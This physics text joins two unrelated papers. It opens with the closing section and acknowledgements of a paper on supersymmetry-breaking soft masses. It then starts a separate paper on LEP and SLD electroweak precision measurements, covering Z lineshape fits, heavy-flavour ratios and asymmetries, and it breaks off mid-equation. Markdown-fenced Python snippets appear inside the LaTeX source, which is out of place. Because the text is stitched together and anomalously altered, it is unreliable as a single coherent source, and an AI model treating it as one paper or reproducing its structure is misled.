$(m_{3/2}^2 + \langle V_F \rangle/M^2)\langle K_l^k \rangle$.
If the magnitude of $F$-term condensation of matter fields
$\langle F_m \rangle$ is bigger than
$O(m_{3/2} M_I)$, the magnitude of $D$-term contribution $(m_D^2)_k$
is bigger than $O(m_{3/2}^2)$.
In general, it is difficult to realize the inequality
$O((m^2_D)_k) < O((m^2_F)_k)$ unless conditions such as
Eq.(\ref{conditions}) are fulfilled.
We have also discussed relations among soft SUSY breaking
parameters in three special scenarios on SUSY breaking,
i.e., dilaton dominant SUSY breaking scenario,
moduli dominant SUSY breaking scenario
and matter dominant SUSY breaking scenario.
The $D$-term contribution to scalar masses with different broken
charges as well as the $F$-term contribution from the difference among
modular weights can destroy universality among scalar masses.
The non-degeneracy among squark masses of first and second families
endangers the discussion of the suppression
of FCNC process.
On the other hand, the difference among broken charges
is crucial for the scenario of fermion mass hierarchy
generation \cite{texture}.
It seems difficult to make the two discussions compatible.
There are several ways out.
The first one is to construct a model in which the fermion mass hierarchy is
generated by non-anomalous $U(1)$ symmetries.
In the model, $D$-term contributions of non-anomalous $U(1)$ symmetries
vanish in the dilaton dominant SUSY breaking case
and it is supposed that anomalies from contributions of
the MSSM matter fields are canceled out
by an addition of extra matter fields.
The second one is to use ``stringy'' symmetries
for fermion mass generation in the situation with degenerate
soft scalar masses \cite{texture2}.
The third one is to use a parameter region in which
the radiative correction due to gauginos, which is flavor independent,
dominates the scalar masses
at the weak scale.
It can be realized when $\langle K^S_S \rangle$ is small enough and
$O(M^2 \langle K^S_{SS} \rangle) < O(\langle K_S \rangle)$.
Finally, we give a comment on the moduli problem \cite{cosmo}.
If the masses of the dilaton or moduli fields are of the order of the weak scale,
the standard nucleosynthesis should be modified
because of a huge amount of entropy production.
The dilaton field does not cause dangerous contributions
in the case with $\langle (K^S_S)^{1/2} F_S \rangle = O(m_{3/2} M)$
if the magnitude of $\langle K_S^S \rangle$
is small enough.\footnote{
This possibility has been pointed out
in the last reference in \cite{corr2}.}
This is because the magnitude of $(m_F^2)_S$ is
given by $O(m_{3/2}^2/\langle K_S^S \rangle^2)$.
\section*{Acknowledgements}
The author is grateful to T.~Kobayashi, H.~Nakano, H.P.~Nilles and
M.~Yamaguchi for useful discussions.
\section{\bf Introduction}
In the context of the Minimal Standard Model (MSM), any ElectroWeak (EW) process
can be computed at tree level from $\alpha$ (the fine structure constant
measured at values of $q^2$ close to zero), $\mathrm{M}_{\mathrm{W}}$~(the W-boson mass),
$\mathrm{M}_{\mathrm{Z}}$~(the Z-boson mass), and $\mathrm{V}_{\mathrm{jk}}$~(the
Cabibbo-Kobayashi-Maskawa flavour-mixing matrix elements).
When higher order corrections are included, any observable can be predicted in the
``on-shell'' renormalization scheme as a function of:
\noindent
\begin{eqnarray}
O_i & = & f_i(\alpha, \alpha_{\mathrm{s}},\mathrm{M}_{\mathrm{W}} ,\mathrm{M}_{\mathrm{Z}},
\mathrm{M}_{\mathrm{H}},\mathrm{m}_{\mathrm{f}},\rm{V}_{\rm{jk}}) \nonumber
\end{eqnarray}
\noindent and contrary to what happens with ``exact gauge symmetry theories'',
like QED or QCD, the effects of heavy particles do not decouple. Therefore, the
MSM predictions depend quadratically on the top mass
($\mathrm{m}^2_{\mathrm{t}}/\mathrm{M}^2_{\mathrm{Z}}$)
and, to a lesser extent, logarithmically on the Higgs mass
(log($\mathrm{M}^2_{\mathrm{H}}/\mathrm{M}^2_{\mathrm{Z}}$)),
or on any kind of ``heavy new physics''.
The subject of this letter is to show how the high precision achieved in the
EW measurements from $\mathrm{Z}^{0}$~physics makes it possible to test the MSM beyond the tree level
predictions and, therefore, how these measurements can indirectly determine
the values of $\mathrm{m}_{\mathrm{t}}$~and $\mathrm{M}_{\mathrm{W}}$,
constrain the unknown value of $\mathrm{M}_{\mathrm{H}}$, and at the same time
test the consistency between measurements and theory. At present the uncertainties
in the theoretical predictions are dominated by the precision on the input
parameters.
\subsection{\bf Input Parameters of the MSM}\label{subsec:input_par}
The W mass is one of the input parameters in the ``on-shell'' renormalization scheme.
It is known with a precision of about 0.07\%, although the usual procedure is
to take $G_{\mu}$~(the Fermi constant measured in the muon decay)
to predict $\mathrm{M}_{\mathrm{W}}$~as a function of the rest of the input parameters
and use this more precise value.
Therefore, the input parameters are chosen to be:
\noindent
\begin{eqnarray}
\rm{Input~Parameter} & \rm{Value} & \rm{Relative~Uncertainty} \nonumber \\
\alpha^{-1}(\mathrm{M}^2_{\mathrm{Z}}) = & 128.896 (90) & 0.07 \% \nonumber \\
\alpha_{\mathrm{s}}(\mathrm{M}^2_{\mathrm{Z}}) = & 0.119 (2) & 1.7 \% \nonumber \\
G_{\mu} = & 1.16639 (2) \times 10^{-5}~\mathrm{GeV^{-2}} & 0.0017 \% \nonumber \\
\mathrm{M}_{\mathrm{Z}} = & 91.1867 (21)~\mathrm{GeV} & 0.0023 \% \nonumber \\
\mathrm{m}_{\mathrm{t}} = & 173.8 (50)~\mathrm{GeV} & 2.9 \% \nonumber \\
\mathrm{M}_{\mathrm{H}} > & 89.8~\mathrm{GeV}~@95\%~C.L. & \nonumber
\end{eqnarray}
Notice that the least well known parameters are $\mathrm{m}_{\mathrm{t}}$, $\alpha_{\mathrm{s}}$~and, of course,
the unknown value of $\mathrm{M}_{\mathrm{H}}$. The next least well known parameter is
$\alpha^{-1}(\mathrm{M}^2_{\mathrm{Z}})$, even though its value at
$q^2 \sim 0$ is known with an amazing relative precision of $4 \times 10^{-8}$,
($\alpha^{-1}(0)=137.0359895~(61)$).
The reason for this loss of precision when one computes the running of $\alpha$,
\noindent
\begin{eqnarray}
\alpha^{-1}(\mathrm{M}^2_{\mathrm{Z}}) & = & \frac{\alpha^{-1}(0)}{1-\Pi_{\gamma\gamma}} \nonumber
\end{eqnarray}
\noindent is the large contribution from the light fermion loops to the photon
vacuum polarisation, $\Pi_{\gamma\gamma}$.
The contribution from leptons and top quark loops is well calculated
but for the light quarks non-perturbative
QCD corrections are large at low energy scales. The method so far
has been to use the measurement of the hadronic cross section
through one-photon exchange, normalised to the point-like muon
cross-section, R(s), and evaluate the dispersion integral:
\noindent
\begin{eqnarray}
\Re(\Pi^{\mathrm{had}}_{\gamma\gamma}) & = & \frac{\alpha \mathrm{M}^2_{\mathrm{Z}}}{3 \pi} \Re
\left( \int \frac{R(s')}{s'(s'-\mathrm{M}^2_{\mathrm{Z}}+i\epsilon)} ds' \right)
\end{eqnarray}
\noindent giving~\cite{OLDALPHA} $\Pi_{\gamma\gamma} = - 0.0632 \pm 0.0007$, the error being
dominated by the experimental uncertainty in the cross section measurements.
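As a numerical cross-check (a sketch, taking the quoted value of $\Pi_{\gamma\gamma}$ as input), the running formula above indeed reproduces the input value $\alpha^{-1}(\mathrm{M}^2_{\mathrm{Z}}) \simeq 128.9$:

```python
# Running of alpha from q^2 ~ 0 up to the Z pole, using the vacuum
# polarisation value quoted in the text (a cross-check, not a new evaluation).
alpha_inv_0 = 137.0359895   # alpha^-1 at q^2 ~ 0
pi_gg = -0.0632             # Pi_gamma,gamma quoted above

alpha_inv_mz = alpha_inv_0 / (1.0 - pi_gg)
print(f"alpha^-1(MZ^2) = {alpha_inv_mz:.2f}")   # ~128.89
```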
Recently, several new {\em ``theory driven''} calculations~\cite{DAVIER}~\cite{NEWALPHA}
have reduced this error by a factor of about 4.5,
by extending the regime of applicability of Perturbative QCD (PQCD). This needs to
be confirmed using precision measurements of the hadronic cross section at
$\sqrt{s} \sim$~1~to~7~GeV. The very preliminary first results from
BES II~\cite{BESS} seem to validate this procedure, being in agreement with
the predictions from PQCD.
\subsection{\bf What are we measuring to test the MSM?}\label{subsec:what_meas}
From the point of view of radiative corrections we can divide the $\mathrm{Z}^{0}$~measurements
into three different groups: the $\mathrm{Z}^{0}$~total and partial widths,
the partial width into b-quarks ($\Gamma_{\mathrm{b}}$), and the $\mathrm{Z}^{0}$~asymmetries ($\sin^2\theta_{\mathrm{eff}}$).
For instance,
the leptonic width ($\Gamma_{\mathrm{l}}$) is mostly sensitive to isospin-breaking loop corrections
($\Delta \rho$), the asymmetries are especially sensitive to radiative corrections to
the $\mathrm{Z}^{0}$~self-energy, and $\mathrm{R}_{\mathrm{b}}$~is mostly sensitive to vertex corrections in the decay
$\mathrm{Z} \rightarrow b \bar{b}$. One more parameter,
$\Delta r$, is necessary to describe the radiative corrections to the relation
between $G_{\mu}$~and $\mathrm{M}_{\mathrm{W}}$.
The sensitivity of these three $\mathrm{Z}^{0}$~observables and $\mathrm{M}_{\mathrm{W}}$~to the input parameters is shown in
table~\ref{tab:sensitiv}. The observables most sensitive to the unknown
value of $\mathrm{M}_{\mathrm{H}}$~are the $\mathrm{Z}^{0}$~asymmetries, parametrised via $\sin^2\theta_{\mathrm{eff}}$. However, the sensitivity
of the remaining observables is also very relevant compared to the achieved experimental precision.
\begin{table}[t]
\caption{ Relative error in units of per-mil on the MSM predictions
induced by the uncertainties on the input parameters. The second column shows
the present experimental errors.\label{tab:sensitiv}}
\vspace{0.2cm}
\begin{center}
\footnotesize
\begin{tabular}{|l|c|c c c c|}
\hline
{} &\raisebox{0pt}[13pt][7pt]{Exp. error} &
\raisebox{0pt}[13pt][7pt]{$\Delta$$\mathrm{m}_{\mathrm{t}}$ = 5.0~GeV} & \raisebox{0pt}[13pt][7pt]{$\Delta$$\mathrm{M}_{\mathrm{H}}$ [90-1000]~GeV} &
\raisebox{0pt}[13pt][7pt]{$\Delta$$\alpha_{\mathrm{s}}$ = 0.002} & \raisebox{0pt}[13pt][7pt]{$\Delta\alpha^{-1}$ = 0.090} \\
\hline
$\Gamma_{\mathrm{Z}}$ & 1.0 & 0.5 & \bf{3.4} & 0.5 & 0.3 \\
$\mathrm{R}_{\mathrm{b}}$ & 3.4 & \bf{0.8} & 0.1 & - & - \\
$\mathrm{M}_{\mathrm{W}}$ & 0.7 & 0.4 & \bf{2.2} & - & 0.2 \\
$\sin^2\theta_{\mathrm{eff}}$ & 0.8 & 0.7 & \bf{5.8} & - & 1.0 \\
\hline
\end{tabular}
\end{center}
\end{table}
\section{\bf $\mathrm{Z}^{0}$~lineshape}
The shape of the resonance is completely characterised by three parameters: the position of the
peak ($\mathrm{M}_{\mathrm{Z}}$), the width ($\Gamma_{\mathrm{Z}}$) and the height ($\sigma^0_{\mathrm{f\bar{f}}}$) of the resonance:
\noindent
\begin{eqnarray}
\sigma^0_{\mathrm{f\bar{f}}} & = & \frac{12\pi}{\mathrm{M}^2_{\mathrm{Z}}}
\frac{\Gamma_{\mathrm{e}}\Gamma_{\mathrm{f}}}{\Gamma^2_{\mathrm{Z}}}
\end{eqnarray}
The good capabilities
of the LEP detectors to identify the lepton flavours allow the measurement of the ratio of
the different lepton species with respect to the hadronic cross-section,
$\mathrm{R}_{\mathrm{l}}$ = $\frac{\Gamma_{\mathrm{h}}}{\Gamma_{\mathrm{l}}}$.
About 16~million $\mathrm{Z}^{0}$~decays have been analysed by the four LEP collaborations,
leading to a statistical precision on $\sigma^0_{\mathrm{f\bar{f}}}$ of 0.03\%!
The limiting factor is therefore not the statistical error, but rather the
experimental systematic and theoretical uncertainties.
The error on the measurement of $\mathrm{M}_{\mathrm{Z}}$~is dominated by the uncertainty on the absolute
scale of the LEP energy measurement (about 1.7~MeV),
while in the case of $\Gamma_{\mathrm{Z}}$~it is the point-to-point
energy and luminosity errors which matter (about 1.3~MeV). The error on $\sigma^0_{\mathrm{f\bar{f}}}$ is
dominated by the theoretical uncertainty on the small-angle Bhabha calculations
(0.11 \%), but this is going to improve very soon with the new estimation
of this uncertainty (0.06 \%) shown at this workshop~\cite{WARD}. Moreover, a QED
uncertainty estimated to be around 0.05 \% has also been included in the fits.
The results of the lineshape fit are shown in table~\ref{tab:lineshape} with and
without the hypothesis of lepton universality. From them, the leptonic widths
and the invisible $\mathrm{Z}^{0}$~width are derived.
\begin{table}[t]
\caption{Average line shape parameters from the results of the four LEP experiments.
\label{tab:lineshape}}
\vspace{0.2cm}
\begin{center}
\footnotesize
\begin{tabular}{|l|c|c|}
\hline
\raisebox{0pt}[13pt][7pt]{Parameter} &
\raisebox{0pt}[13pt][7pt]{Fitted Value} &
\raisebox{0pt}[13pt][7pt]{Derived Parameters} \\
\hline
$\mathrm{M}_{\mathrm{Z}}$ & 91186.7 $\pm$ 2.1~MeV & \\
$\Gamma_{\mathrm{Z}}$ & 2493.9 $\pm$ 2.4~MeV & \\
$\sigma^0_{\mathrm{had}}$ & 41.491 $\pm$ 0.058~nb & \\
$\mathrm{R}_{\mathrm{e}}$ & 20.783 $\pm$ 0.052 & $\Gamma_{\mathrm{e}}$ = 83.87 $\pm$ 0.14~MeV \\
$\mathrm{R}_{\mu}$ & 20.789 $\pm$ 0.034 & $\Gamma_{\mu}$ = 83.84 $\pm$ 0.18~MeV \\
$\mathrm{R}_{\tau}$ & 20.764 $\pm$ 0.045 & $\Gamma_{\tau}$ = 83.94 $\pm$ 0.22~MeV \\
\hline
\multicolumn{3}{|c|}{\raisebox{0pt}[12pt][6pt]{With Lepton Universality}} \\
\hline
& & $\Gamma_{\mathrm{had}}$= 1742.3 $\pm$ 2.3~MeV \\
$\mathrm{R}_{\mathrm{l}}$ & 20.765 $\pm$ 0.026 & $\Gamma_{\mathrm{l}}$ = 83.90 $\pm$ 0.10~MeV \\
& & $\Gamma_{\mathrm{inv}}$= 500.1 $\pm$ 1.9~MeV \\
\hline
\end{tabular}
\end{center}
\end{table}
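As a consistency check (a numerical sketch, not part of the fit), inserting the fitted widths of table~\ref{tab:lineshape} into the expression for $\sigma^0_{\mathrm{f\bar{f}}}$ above reproduces the measured hadronic peak cross-section:

```python
import math

# Peak hadronic cross-section from the fitted lineshape parameters;
# hbar^2 c^2 = 0.3894 GeV^2 mb = 0.3894e6 GeV^2 nb converts to nanobarns.
MZ = 91.1867        # GeV
GZ = 2.4939         # GeV, total width
Ge = 0.08390        # GeV, leptonic width (lepton universality)
Ghad = 1.7423       # GeV, hadronic width
HBARC2 = 0.3894e6   # GeV^2 nb

sigma_had = 12.0 * math.pi / MZ**2 * Ge * Ghad / GZ**2 * HBARC2
print(f"sigma0_had = {sigma_had:.2f} nb")   # ~41.5, measured 41.491 +- 0.058
```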
From the measurement of the $\mathrm{Z}^{0}$~invisible width, and assuming the ratio of the partial widths to
neutrinos and leptons to be given by the MSM prediction
($\frac{\Gamma_{\nu}}{\Gamma_{\mathrm{l}}} = 1.991 \pm 0.001 $), the number of light neutrino
species is measured to be
\noindent
\begin{eqnarray}
\mathrm{N}_{\nu} & = & 2.994 \pm 0.011. \nonumber
\end{eqnarray}
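The arithmetic behind this determination is simple enough to sketch directly (values from table~\ref{tab:lineshape}):

```python
# Number of light neutrino species from the invisible width, using
# Gamma_nu/Gamma_l = 1.991 as predicted by the MSM.
Gamma_inv = 500.1   # MeV
Gamma_l = 83.90     # MeV
ratio_MSM = 1.991   # Gamma_nu / Gamma_l in the MSM

N_nu = (Gamma_inv / Gamma_l) / ratio_MSM
print(f"N_nu = {N_nu:.3f}")   # ~2.994
```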
Alternatively, one can assume three neutrino species and determine the width from additional
invisible decays of the $\mathrm{Z}^{0}$~to be $\Delta\Gamma_{\mathrm{inv}}<2.8$~MeV~@95\%~C.L.
The measurement of $\mathrm{R}_{\mathrm{l}}$~is very sensitive to PQCD corrections and can thus be used to determine
the value of $\alpha_{\mathrm{s}}$. A combined fit to the measurements shown in table~\ref{tab:lineshape}, and
imposing $\mathrm{m}_{\mathrm{t}}$=173.8$\pm$5.0~GeV as a constraint gives:
\noindent
\begin{eqnarray}
\alpha_{\mathrm{s}}(\mathrm{M}^2_{\mathrm{Z}}) & = & 0.123 \pm 0.004 \nonumber
\end{eqnarray}
\noindent in agreement with the world average~\cite{ALPHAS}
$\alpha_{\mathrm{s}}(\mathrm{M}^2_{\mathrm{Z}}) = 0.119 \pm 0.002$.
\subsection{\bf Heavy flavour results}\label{subsec:HF}
The large mass and long lifetime of the $b$ and $c$ quarks provide a way to perform flavour tagging.
This allows for precise measurements of the partial widths of the decays $\mathrm{Z}^{0}$$\rightarrow c \bar{c}$ and
$\mathrm{Z}^{0}$$\rightarrow b \bar{b}$. It is useful to normalise the partial width to $\Gamma_{\mathrm{h}}$~by
measuring the partial decay fractions with respect to all hadronic decays
\noindent
\begin{eqnarray}
\mathrm{R}_{\mathrm{c}} \equiv \frac{\Gamma_{c}}{\Gamma_{\mathrm{h}}} & , &
\mathrm{R}_{\mathrm{b}} \equiv \frac{\Gamma_{b}}{\Gamma_{\mathrm{h}}}. \nonumber
\end{eqnarray}
With this definition most of the radiative corrections appear both in the numerator
and denominator and thus cancel out, with the important exception of the vertex corrections
in the $\mathrm{Z}^{0}$ $b\bar{b}$ vertex. This is the only relevant correction to $\mathrm{R}_{\mathrm{b}}$, and within the
MSM basically depends on a single parameter, the mass of the top quark.
The partial decay fractions of the $\mathrm{Z}^{0}$~to other quark flavours, like $\mathrm{R}_{\mathrm{c}}$, are only weakly
dependent on $\mathrm{m}_{\mathrm{t}}$; the residual weak dependence is indeed due to the presence of
$\Gamma_{b}$ in the denominator. The MSM predicts $\mathrm{R}_{\mathrm{c}}$ = 0.172, valid over a wide
range of the input parameters.
The combined values from the measurements of LEP and SLD gives
\noindent
\begin{eqnarray}
\mathrm{R}_{\mathrm{b}} & = & 0.21656 \pm 0.00074 \nonumber \\
\mathrm{R}_{\mathrm{c}} & = & 0.1735 \pm 0.0044 \nonumber
\end{eqnarray}
\noindent with a correlation of -17\% between the two values.
\section{\bf $\mathrm{Z}^{0}$~asymmetries: $\boldmath{\sin^2\theta_{\mathrm{eff}}}$ }
Parity violation in the weak neutral current is caused by the difference of couplings
of the $\mathrm{Z}^{0}$~to right-handed and left-handed fermions. If we define $A_{\mathrm{f}}$ as
\noindent
\begin{eqnarray}
A_{\mathrm{f}} & \equiv &
\frac{2 \biggl( \frac{g^f_V}{g^f_A} \biggr) }{1 + \biggl( \frac{g^f_V}{g^f_A}\biggr)^2},
\end{eqnarray}
\noindent where $g^f_{V(A)}$ denotes the vector(axial-vector) coupling constants, one can write
all the $\mathrm{Z}^{0}$~asymmetries in terms of $A_{\mathrm{f}}$.
Each process $e^+ e^- \rightarrow \mathrm{Z}^{0} \rightarrow \mathrm{f}\bar{\mathrm{f}}$
can be characterised
by the direction and the helicity of the emitted fermion (f). Calling forward the hemisphere
into which the electron beam is pointing, the events can be subdivided into four categories:
FR,BR,FL and BL, corresponding to right-handed (R) or left-handed (L) fermions emitted
in the forward (F) or backward (B) direction. Then, one can write three $\mathrm{Z}^{0}$~asymmetries
as:
\noindent
\begin{eqnarray}
A_{\mathrm{pol}} \equiv &
\frac{\sigma_{\mathrm{FR}}+\sigma_{\mathrm{BR}}-\sigma_{\mathrm{FL}}-\sigma_{\mathrm{BL}}}
{\sigma_{\mathrm{FR}}+\sigma_{\mathrm{BR}}+\sigma_{\mathrm{FL}}+\sigma_{\mathrm{BL}}}
& = -A_{\mathrm{f}} \\
A^{\mathrm{FB}}_{\mathrm{pol}} \equiv &
\frac{\sigma_{\mathrm{FR}}+\sigma_{\mathrm{BL}}-\sigma_{\mathrm{BR}}-\sigma_{\mathrm{FL}}}
{\sigma_{\mathrm{FR}}+\sigma_{\mathrm{BR}}+\sigma_{\mathrm{FL}}+\sigma_{\mathrm{BL}}}
& = -\frac{3}{4} A_{\mathrm{e}} \\
A_{\mathrm{FB}} \equiv &
\frac{\sigma_{\mathrm{FR}}+\sigma_{\mathrm{FL}}-\sigma_{\mathrm{BR}}-\sigma_{\mathrm{BL}}}
{\sigma_{\mathrm{FR}}+\sigma_{\mathrm{BR}}+\sigma_{\mathrm{FL}}+\sigma_{\mathrm{BL}}}
& = \frac{3}{4} A_{\mathrm{e}}A_{\mathrm{f}}
\end{eqnarray}
\noindent and in case the initial state is polarised with some degree of polarisation
($P$), one can define:
\noindent
\begin{eqnarray}
A_{\mathrm{LR}} \equiv & \frac{1}{P}
\frac{\sigma_{\mathrm{Fl}}+\sigma_{\mathrm{Bl}}-\sigma_{\mathrm{Fr}}-\sigma_{\mathrm{Br}}}
{\sigma_{\mathrm{Fr}}+\sigma_{\mathrm{Br}}+\sigma_{\mathrm{Fl}}+\sigma_{\mathrm{Bl}}}
& = A_{\mathrm{e}} \\
A^{\mathrm{pol}}_{\mathrm{FB}} \equiv & -\frac{1}{P}
\frac{\sigma_{\mathrm{Fr}}+\sigma_{\mathrm{Bl}}-\sigma_{\mathrm{Fl}}-\sigma_{\mathrm{Br}}}
{\sigma_{\mathrm{Fr}}+\sigma_{\mathrm{Br}}+\sigma_{\mathrm{Fl}}+\sigma_{\mathrm{Bl}}}
& = \frac{3}{4} A_{\mathrm{f}}
\end{eqnarray}
\noindent where r(l) denotes the right(left)-handed initial state polarisation. Assuming lepton
universality, all these observables depend only on the ratio between the vector and axial-vector
couplings. It is conventional to define the effective mixing angle $\sin^2\theta_{\mathrm{eff}}$~as
\noindent
\begin{eqnarray}
\sin^2\theta_{\mathrm{eff}} & \equiv & \frac{1}{4} \biggl( 1 - \frac{g^l_V}{g^l_A} \biggr)
\end{eqnarray}
\noindent and to collapse all the asymmetries into a single parameter $\sin^2\theta_{\mathrm{eff}}$.
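The translation from $\sin^2\theta_{\mathrm{eff}}$~to $A_{\mathrm{l}}$ and to the forward-backward asymmetry is a one-line exercise; as a sketch (using as input the combined lepton value quoted in section~\ref{subsec:lepton_coup}):

```python
# From sin^2(theta_eff) to the coupling parameter A_l and to the
# forward-backward asymmetry A_FB^l = (3/4) A_l^2 (lepton universality).
def coupling_A(sin2_eff):
    x = 1.0 - 4.0 * sin2_eff        # g_V / g_A for a charged lepton
    return 2.0 * x / (1.0 + x * x)

s2 = 0.23128                        # combined lepton value (see below)
A_l = coupling_A(s2)
A_fb = 0.75 * A_l**2
print(f"A_l = {A_l:.4f}, A_FB^l = {A_fb:.5f}")   # ~0.1489, ~0.0166
```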
\subsection{\bf Lepton asymmetries}\label{subsec:lepton_asym}
\subsubsection{\bf Angular distribution}\label{subsec:lepton_afb}
The lepton forward-backward asymmetry is measured from the angular distribution
of the final state lepton.
The measurement of $A^{\mathrm{l}}_{FB}$ is quite simple and robust and its
accuracy is limited by the statistical error. The common systematic uncertainty in the LEP measurement
due to the uncertainty on the LEP energy measurement is about~0.0007.
The values measured by the LEP collaborations are in agreement with lepton universality,
\noindent
\begin{eqnarray}
& A^e_{\mathrm{FB}} = 0.0153 \pm 0.0025 & \nonumber \\
& A^{\mu}_{\mathrm{FB}} = 0.0164 \pm 0.0013 & \nonumber \\
& A^{\tau}_{\mathrm{FB}}= 0.0183 \pm 0.0017 & \nonumber
\end{eqnarray}
\noindent and can be combined into a single measurement of $\sin^2\theta_{\mathrm{eff}}$,
\noindent
\begin{eqnarray}
A^{\mathrm{l}}_{\mathrm{FB}}= 0.01683 \pm 0.00096 & \Longrightarrow &
{ \sin^2\theta_{\mathrm{eff}} = 0.23117 \pm 0.00054}. \nonumber
\end{eqnarray}
\subsubsection{\bf Tau polarisation at LEP}\label{subsec:lepton_taupol}
Tau leptons decaying inside the apparatus acceptance can be used to measure
the polarised asymmetries defined by equations~(4) and~(5). A more sensitive method
is to fit the measured dependence of $A_{\mathrm{pol}}$ as a function of the
polar angle $\theta$ :
\noindent
\begin{eqnarray}
A_{\mathrm{pol}}(\cos\theta) & = &
- \frac{A_{\tau}(1+\cos^2\theta)+2 A_e \cos\theta}{(1+\cos^2\theta) + 2 A_{\tau} A_e \cos\theta }
\end{eqnarray}
The sensitivity of this measurement to $\sin^2\theta_{\mathrm{eff}}$~is larger because the dependence
on $A_{\mathrm{l}}$ is linear to a good approximation.
The accuracy of the measurements is dominated by the statistical
error. The typical systematic error is about 0.003 for $A_{\tau}$ and 0.001 for $A_e$.
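Equation (9) also makes explicit why the angular fit gains access to $A_e$ through the $\cos\theta$-odd term, while the acceptance-averaged polarisation measures only $-A_\tau$; a minimal numerical sketch (not the actual likelihood fit used by the experiments):

```python
# Tau polarisation vs cos(theta): the cos-odd term carries A_e, while the
# average over a symmetric acceptance measures -A_tau only.
def a_pol(c, A_tau, A_e):
    num = -(A_tau * (1.0 + c * c) + 2.0 * A_e * c)
    den = (1.0 + c * c) + 2.0 * A_tau * A_e * c
    return num / den

A_tau, A_e = 0.1431, 0.1479         # LEP fitted values quoted below

# acceptance average: integrate numerator and denominator separately
n = 20000
grid = [-1.0 + (i + 0.5) * 2.0 / n for i in range(n)]
num = sum(-(A_tau * (1.0 + c * c) + 2.0 * A_e * c) for c in grid)
den = sum((1.0 + c * c) + 2.0 * A_tau * A_e * c for c in grid)
print(a_pol(0.0, A_tau, A_e))       # exactly -A_tau at cos(theta) = 0
print(num / den)                    # ~ -A_tau over the full acceptance
```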
The LEP measurements are:
\noindent
\begin{eqnarray}
A_{e} = 0.1479 \pm 0.0051 & \Longrightarrow &
{ \sin^2\theta_{\mathrm{eff}} = 0.23141 \pm 0.00065} \nonumber \\
A_{\tau}= 0.1431 \pm 0.0045 & \Longrightarrow &
{ \sin^2\theta_{\mathrm{eff}} = 0.23202 \pm 0.00057} \nonumber
\end{eqnarray}
\subsection{\bf $\mathrm{A}_{\mathrm{LR}}$~from SLD}\label{subsec:alr}
The linear accelerator at SLAC (SLC) makes it possible to collide positrons
with a highly longitudinally polarised electron beam (up to 77\% polarisation). Therefore,
the SLD detector can measure the left-right cross-section asymmetry ($\mathrm{A}_{\mathrm{LR}}$)
defined by equation~(7). This observable is a factor of 4.6 more sensitive to
$\sin^2\theta_{\mathrm{eff}}$~than, for instance, $A^{\mathrm{l}}_{\mathrm{FB}}$ for a given precision.
The measurement is potentially free of experimental
systematic errors, with the exception of the polarisation measurement, which
has been carefully cross-checked at the 1\% level. The last update on this
measurement gives
\noindent
\begin{eqnarray}
A_{\mathrm{LR}} = 0.1510 \pm 0.0025 & \Longrightarrow &
{ \sin^2\theta_{\mathrm{eff}} = 0.23101 \pm 0.00031}, \nonumber
\end{eqnarray}
\noindent and assuming lepton universality it can be
combined with preliminary measurements at SLD of the lepton
left-right forward-backward asymmetry ($A^{\mathrm{pol}}_{\mathrm{FB}}$)
defined in equation~(8) to give
\noindent
\begin{eqnarray}
& {\sin^2\theta_{\mathrm{eff}} = 0.23109 \pm 0.00029}. & \nonumber
\end{eqnarray}
\subsection{\bf Lepton couplings}\label{subsec:lepton_coup}
All the previous measurements of the lepton coupling ($A_{\mathrm{l}}$) can be
combined, with a $\chi^2/\mathrm{dof}=2.2/3$, to give
\noindent
\begin{eqnarray}
A_{\mathrm{l}} = 0.1489 \pm 0.0017 & \Longrightarrow &
{\sin^2\theta_{\mathrm{eff}} = 0.23128 \pm 0.00022}. \nonumber
\end{eqnarray}
The asymmetries measured are only sensitive to the ratio between the
vector and axial-vector couplings. If we also include the measurement
of the leptonic width shown in table~\ref{tab:lineshape} we can
fit the lepton couplings to the $\mathrm{Z}^{0}$~to be
\noindent
\begin{eqnarray}
g^l_V & = & -0.03753 \pm 0.00044, \nonumber \\
g^l_A & = & -0.50102 \pm 0.00030, \nonumber
\end{eqnarray}
\noindent where the sign is chosen to be negative by definition.
Figure~\ref{fig:gvga} shows the 68~\% probability contours in the
$g^l_V - g^l_A$ plane.
\begin{figure}
\centering
\mbox{%
\epsfig{file=gvga.eps
,height=8cm
,width=10cm
}%
}
\caption{Contours of 68\% probability in the $g^l_V - g^l_A$ plane. The solid
contour results from a fit assuming lepton universality. Also shown is the one
standard deviation band resulting from the $\mathrm{A}_{\mathrm{LR}}$~measurement of SLD.}
\label{fig:gvga}
\end{figure}
\subsection{\bf Quark asymmetries}\label{subsec:quark_asym}
\subsubsection{\bf Heavy Flavour asymmetries}\label{subsec:HF_asym}
The inclusive measurement of the $b$ and $c$ asymmetries is more sensitive
to $\sin^2\theta_{\mathrm{eff}}$~than, for instance, the leptonic forward-backward asymmetry. The
reason is that $A_b$ and $A_c$ are mostly independent of $\sin^2\theta_{\mathrm{eff}}$, therefore
$A^{b(c)}_{\mathrm{FB}}$ (which is proportional to the product $A_e A_{b(c)}$)
is a factor 3.3(2.4) more sensitive than $A^{\mathrm{l}}_{\mathrm{FB}}$.
The typical systematic uncertainty in $A^{b(c)}_{\mathrm{FB}}$ is
about 0.001(0.002) and the precision of the measurement is
dominated by statistics.
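These enhancement factors can be estimated from the tree-level effective couplings $g_V/g_A = 1 - 2Q_{\mathrm{f}}\sin^2\theta_{\mathrm{eff}}/T^3_{\mathrm{f}}$ (a rough sketch; electroweak corrections are neglected, so the numbers come out close to, but not exactly at, the quoted 3.3 and 2.4):

```python
# Relative sensitivity of the b, c and lepton forward-backward asymmetries
# to sin^2(theta_eff), from tree-level couplings g_V/g_A = 1 - 2*Q*s2/T3.
def A_f(s2, Q, T3):
    r = 1.0 - 2.0 * Q * s2 / T3     # g_V / g_A
    return 2.0 * r / (1.0 + r * r)

def afb(s2, Q, T3):                 # A_FB^f = (3/4) A_e A_f
    return 0.75 * A_f(s2, -1.0, -0.5) * A_f(s2, Q, T3)

def slope(f, s2, eps=1.0e-5):       # numerical derivative in s2
    return (f(s2 + eps) - f(s2 - eps)) / (2.0 * eps)

s2 = 0.2315
db = slope(lambda x: afb(x, -1.0 / 3.0, -0.5), s2)
dc = slope(lambda x: afb(x, 2.0 / 3.0, 0.5), s2)
dl = slope(lambda x: afb(x, -1.0, -0.5), s2)
print(db / dl, dc / dl)             # roughly 3.2 and 2.5
```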
SLD can measure also the $b$ and $c$
left-right forward-backward asymmetry defined in equation~(8) which is
a direct measurement of the quark coupling $A_b$ and $A_c$.
The combined fit for the LEP and SLD measurements gives
\noindent
\begin{eqnarray}
A^b_{\mathrm{FB}}= 0.0990 \pm 0.0021 & \Longrightarrow & {\sin^2\theta_{\mathrm{eff}} = 0.23225 \pm 0.00038}
\nonumber \\
